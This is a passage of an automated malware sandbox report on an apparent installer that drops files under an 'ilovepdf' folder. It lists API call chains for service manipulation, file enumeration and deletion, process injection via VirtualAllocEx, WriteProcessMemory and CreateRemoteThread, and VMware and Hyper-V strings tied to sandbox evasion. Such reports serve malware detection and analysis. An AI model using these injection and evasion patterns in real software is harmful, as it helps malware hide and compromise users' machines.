Source: C:\Windows\SysWOW64\rundll32.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,CloseServiceHandle,Sleep,LocalAlloc,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,StartServiceW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,LocalAlloc,LocalAlloc,OpenServiceW,QueryServiceConfigW,QueryServiceConfig2W,CloseServiceHandle,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalReAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalReAlloc,LocalFree,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,CloseServiceHandle,LocalAlloc,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,LocalFree,LocalAlloc,OpenServiceW,QueryServiceConfigW,StrStrIW,CloseServiceHandle,LocalFree,LocalFree,CloseServiceHandle,
Source: C:\Windows\System32\svchost.exe | Thread delayed: delay time: 3600000
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 717
Source: C:\Windows\System32\svchost.exe | Window / User API: threadDelayed 1082
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F3384410
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EB3C30
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-30MA7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\ti.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-93C0J.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\twlib.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-JDQA9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\tt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\th.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\svchost.exe | Thread delayed: delay time: 3600000
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC4560 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp | Binary or memory string: "@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000.ifo
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}#{6ead3d82-25ec-46bc-b7fd-c1f0df8f5037}
Source: svchost.exe, 00000026.00000002.827434902.0000025C96535000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWe>%SystemRoot%\system32\mswsock.dll<IdleSettings>
Source: svchost.exe, 00000010.00000003.500955879.0000012E19682000.00000004.00000001.sdmp | Binary or memory string: VMware, Inc.
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}
Source: svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWMSAFD Irda [IrDA]OleMainThreadWndClass
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmp, svchost.exe, 00000011.00000000.333907246.00000204F304E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000000.341000431.000001D91A429000.00000004.00000001.sdmp, svchost.exe, 00000018.00000000.359760415.000001DC51288000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.533385222.000001AFB9A82000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000026.00000000.409171798.0000025C96594000.00000004.00000001.sdmp | Binary or memory string: VMware, Inc.ed
Source: svchost.exe, 0000001E.00000000.383086421.000001BE5C029000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: svchost.exe, 00000015.00000002.812290749.000002F2C5013000.00000004.00000001.sdmp | Binary or memory string: Allow inbound TCP port 636 traffic for vmicheartbeat
Source: svchost.exe, 0000001E.00000002.816717606.000001BE5C115000.00000004.00000001.sdmp | Binary or memory string: nonic\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}DeviceArrivalPU
Source: svchost.exe, 0000001E.00000002.807078645.000000220DAFA000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000001e9-90ce-806e6f6e6963}\
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
Source: svchost.exe, 0000001E.00000000.383086421.000001BE5C029000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 0000000D.00000002.415655644.000000000339A000.00000004.00000020.sdmp, svchost.exe, 0000000E.00000002.812356243.0000024B7CA36000.00000004.00000001.sdmp, svchost.exe, 00000013.00000000.337659687.000002334203F000.00000004.00000001.sdmp, svchost.exe, 00000015.00000000.344287290.000002F2C5029000.00000004.00000001.sdmp, svchost.exe, 00000016.00000000.348368674.00000222CA43F000.00000004.00000001.sdmp, svchost.exe, 00000017.00000002.813571849.0000028621678000.00000004.00000001.sdmp, svchost.exe, 00000019.00000000.364042683.000002216AA5A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.816000256.000002743903C000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000000.376788702.000001111A236000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000000.380313179.0000022F11A29000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.810844808.0000021C22429000.00000004.00000001.sdmp, svchost.exe, 00000022.00000003.572028015.00000202B1ABD000.00000004.00000001.sdmp, svchost.exe, 00000025.00000000.401740945.000001AFB9AA4000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000026.00000000.409171798.0000025C96594000.00000004.00000001.sdmp | Binary or memory string: VMware7,1L
Source: svchost.exe, 0000001B.00000000.366941643.0000027439029000.00000004.00000001.sdmp | Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
Source: svchost.exe, 0000001E.00000002.815535312.000001BE5C07A000.00000004.00000001.sdmp | Binary or memory string: l\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}22\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: svchost.exe, 00000010.00000003.682254804.0000012E19614000.00000004.00000001.sdmp | Binary or memory string: (5>OVMware, Inc.VMware Virtual disk 2.0 E4F221468}
Source: svchost.exe, 00000026.00000000.407855374.0000025C95C8A000.00000004.00000001.sdmp | Binary or memory string: VMware820ES
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmp | Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000011.00000000.331175005.00000204F3067000.00000004.00000001.sdmp | Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmp | Binary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmp | Binary or memory string: (5>OVMware, Inc.VMware Virtual disk 2.0
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{7fccc86c-228a-40ad-8a58-f590af7bfdce}b}}
Source: svchost.exe, 00000026.00000000.407855374.0000025C95C8A000.00000004.00000001.sdmp | Binary or memory string: VMware8
Source: svchost.exe, 0000001E.00000002.815535312.000001BE5C07A000.00000004.00000001.sdmp | Binary or memory string: AASCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000&00A8
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmp | Binary or memory string: VMware
Source: svchost.exe, 00000011.00000000.329876741.00000204EFA29000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW}
Source: svchost.exe, 00000010.00000002.812470084.0000012E17623000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW@
Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0040AEF4 FindFirstFileW,FindClose,
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_0040E6A0 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_0060BC10 FindFirstFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_006B76A0 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EB4C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EB56D0 FindFirstFileW,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EB4E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EB57F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EE97D9 FindFirstFileExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EB42B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EB6A30 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EB53D0 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC7390 lstrcpyW,lstrcatW,lstrcatW,CreateDirectoryW,GetLastError,GetLastError,FindFirstFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D5E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0EAE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D57B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D49FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D7A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D4AE3 FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D63F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D110478 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D4B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17874AE3 FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178749FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17877A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178757B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17875E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1788AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178B0478 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178763F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17874B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19805CF4 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19823D90 FindFirstFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198EB2F0 FindFirstFileW,FreeEnvironmentStringsW,GetCommandLineA,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33863F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C0478 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384AE3 FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33849FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3387A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33857B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3385E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EDEFAF mov eax, dword ptr fs:[00000030h]
